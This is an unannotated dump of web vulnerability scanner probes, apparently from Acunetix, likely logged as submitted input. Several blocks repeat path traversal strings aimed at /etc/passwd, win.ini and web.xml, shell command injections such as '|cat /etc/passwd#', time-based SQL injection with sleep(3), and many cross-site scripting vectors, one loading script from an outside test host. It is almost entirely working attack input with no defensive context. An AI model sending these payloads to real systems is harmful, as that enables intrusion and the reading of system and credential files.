SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

................windowswin.ini

1

1

1

1

1

cat /etc/passwd

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

`cat /etc/passwd`

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../../../../../../../../../../etc/passwd

1

1

1

|cat /etc/passwd#

1

1

acu5510\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5510

${99490+99299}

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

acux8208\xc0\xbez1\xc0\xbcz2a\x90bcxuca8208

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1&n980499=v935548

1

1<ScRiPt >prompt(981949)</ScRiPt>

1

"|"ld

)

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<script>prompt(994006)</script>

1

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

-1)

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(908617)</ScRiPt>

^(#$!@#$)(()))******

1

'

1

-1))

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935538></ScRiPt>

testasp.vulnweb.com

'"()

WEB-INF\web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

"

1

ZaCAs5PL'

1

1

1<ScRiPt >prompt(976488)</ScRiPt>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<video><source onerror="javascript:prompt(929875)">

2hWSqG4A')

1

1

1

||cat /etc/passwd

1

1

1

/etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962204)"></g></svg>

KYLkYX94'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

&dir

1

1

1

1<div style=width:expression(prompt(992777))>

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1

1

'&dir&'

1<iframe src='data:text/html

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

http://hityzouyf2QOI.bxss.me/

1

"&dir&"

-1))

1<body onload=prompt(952639)>

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921055)>

|dir

1

jbVsPFaY'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(939219)>

1

'|dir

1

1

TJwrcqg6')

comments

1

http://www.acunetix.tst

1<img/src=">" onerror=alert(913556)>

"|dir

'"

file:///etc/passwd

5I8YdqY6'))

1

1'"()&%<ScRiPt >prompt(954786)</ScRiPt>

comments/.

1<ScRiPt%20>prompt(984159)</sCripT>

<!--

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(991857)</ScRiPt>

1&lt

1

1

1

1

1

1

WEB-INF/web.xml

1

\xf6<img acu onmouseover=prompt(904100) //\xf6>

1

response.write(9669211*9966690)

1_944541

1

1

1

1<input autofocus onfocus=prompt(930383)>

WEB-INF\web.xml

'+response.write(9669211*9966690)+'

1

1

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

"+response.write(9669211*9966690)+"

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1_v52oD <ScRiPt >prompt(976365)</ScRiPt>

'&cat /etc/passwd&'

1

../../../../../../../../../../boot.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

cat /etc/passwd

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

................windowswin.ini

1

1

`cat /etc/passwd`

..\..\..\..\..\..\..\..\windows\win.ini

acu3375\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3375

1

1

${100383+99300}

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

1

1

acux7800\xc0\xbez1\xc0\xbcz2a\x90bcxuca7800

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(993879)</ScRiPt>

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n924192=v932271

1some_inexistent_file_with_long_name%00.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<script>prompt(961413)</script>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(932120)</ScRiPt>

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

)

-1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955877></ScRiPt>

!(()&&!|*|*|

'

/etc/passwd

1

1

-1)

1

WEB-INF/web.xml

1<ScRiPt >prompt(958962)</ScRiPt>

^(#$!@#$)(()))******

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

-1))

WEB-INF\web.xml

1

1

1

1<video><source onerror="javascript:prompt(945630)">

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"()

IiKRg5xS'

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908426)"></g></svg>

1

&dir

1

1

VwxoWVk8'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<div style=width:expression(prompt(995718))>

'

1

1

'&dir&'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<iframe src='data:text/html

1

1

"

8x8I3PUL')

http://hitQew6ca6Psh.bxss.me/

1

"&dir&"

1

1<body onload=prompt(977592)>

1

pMfWG8qW'))

file:///etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959076)>

1

|dir

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

1<img src=xyz OnErRor=prompt(933990)>

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'|dir

1

-1)

1

comments

1<img/src=">" onerror=alert(995901)>

1

WEB-INF/web.xml

1

http://www.acunetix.tst

1<ScRiPt%20>prompt(985792)</sCripT>

comments/.

'"

"|dir

1

-1))

1'"()&%<ScRiPt >prompt(998876)</ScRiPt>

1&lt

WEB-INF\web.xml

1

<!--

1

1

1

'"()&%<ScRiPt >prompt(938230)</ScRiPt>

\xf6<img acu onmouseover=prompt(902987) //\xf6>

1

L6hs4ckZ'

1

1

1

../../../../../../../../../../windows/win.ini

1<input autofocus onfocus=prompt(923791)>

1

1

1

yXx2HMQR')

1_935319

1

1

1

../../../../../../../../../../boot.ini

response.write(9755796*9242043)

<a href='http://www.acunetix.com'>website security</a>

1

484kmNNM'))

1

1

1

'+response.write(9755796*9242043)+'

1

../../../../../../../../../../windows/win.ini.jpg

[url=http://www.acunetix.com]website security[/url]

1

1

&cat /etc/passwd&

"+response.write(9755796*9242043)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1_RmZEd <ScRiPt >prompt(924210)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

'&cat /etc/passwd&'

1

1

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

1

acu8655\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8655

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

acux4697\xc0\xbez1\xc0\xbcz2a\x90bcxuca4697

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

${99400+99098}

1

|cat /etc/passwd#

1<ScRiPt >prompt(940034)</ScRiPt>

1

1

../../../../../../../../../../etc/passwd.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n982943=v955712

1<script>prompt(903641)</script>

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(931099)</ScRiPt>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF/web.xml

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945787></ScRiPt>

)

1

testasp.vulnweb.com

-1)

1

1

WEB-INF\web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt >prompt(952116)</ScRiPt>

!(()&&!|*|*|

-1))

1

1

1

1

1

1<video><source onerror="javascript:prompt(995469)">

^(#$!@#$)(()))******

xSUX9wZq'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999031)"></g></svg>

1

1

1

riVzDUz3')

1

/etc/passwd

"

1

1<div style=width:expression(prompt(938805))>

1

1

1

1

1

QWv7uvYI'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<iframe src='data:text/html

||cat /etc/passwd

1

1

1

1

1

-1

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<body onload=prompt(988931)>

1

1

'"()

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(976987)>

1

1

1

1

1

-1))

"

1<img src=xyz OnErRor=prompt(908362)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"&dir&"

1

dq2JgTFp'

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1<img/src=">" onerror=alert(943396)>

1

|dir

${@print(md5(acunetix_wvs_security_test))}\

DDf0w3uQ')

http://hit0oLwrq5TZ6.bxss.me/

file:///etc/passwd

1

1<ScRiPt%20>prompt(980330)</sCripT>

acunetix_wvs_invalid_filename

1

1

1

1

'|dir

sZh273Et'))

1

/\../\../\../\../\../\../\../etc/passwd

comments

1&lt

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"|dir

1

http://www.acunetix.tst

1

\xf6<img acu onmouseover=prompt(913505) //\xf6>

WEB-INF/web.xml

1

comments

1<input autofocus onfocus=prompt(951362)>

1

1

1

comments/.

WEB-INF\web.xml

'"

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1'"()&%<ScRiPt >prompt(984049)</ScRiPt>

1

1

<!--

../../../../../../../../../../windows/win.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

'"()&%<ScRiPt >prompt(951134)</ScRiPt>

1

1

1

1_JKnYk <ScRiPt >prompt(908680)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1

1_999878

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

acu1278\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1278

1

1

1

1

acux5390\xc0\xbez1\xc0\xbcz2a\x90bcxuca5390

1

WEB-INF/web.xml

1<ScRiPt >prompt(982295)</ScRiPt>

1

1

WEB-INF\web.xml

1<script>prompt(929268)</script>

1

1

1<ScRiPt >prompt(979319)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932707></ScRiPt>

1

1

1<ScRiPt >prompt(974373)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(913478)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920716)"></g></svg>

1

1

1<div style=width:expression(prompt(965020))>

1

1

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(932240)>

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969808)>

1

1<img src=xyz OnErRor=prompt(920024)>

1

1<img/src=">" onerror=alert(921665)>

1

1

1<ScRiPt%20>prompt(949880)</sCripT>

1

1&lt

1

\xf6<img acu onmouseover=prompt(916151) //\xf6>

1<input autofocus onfocus=prompt(913306)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_1m4gL <ScRiPt >prompt(980692)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1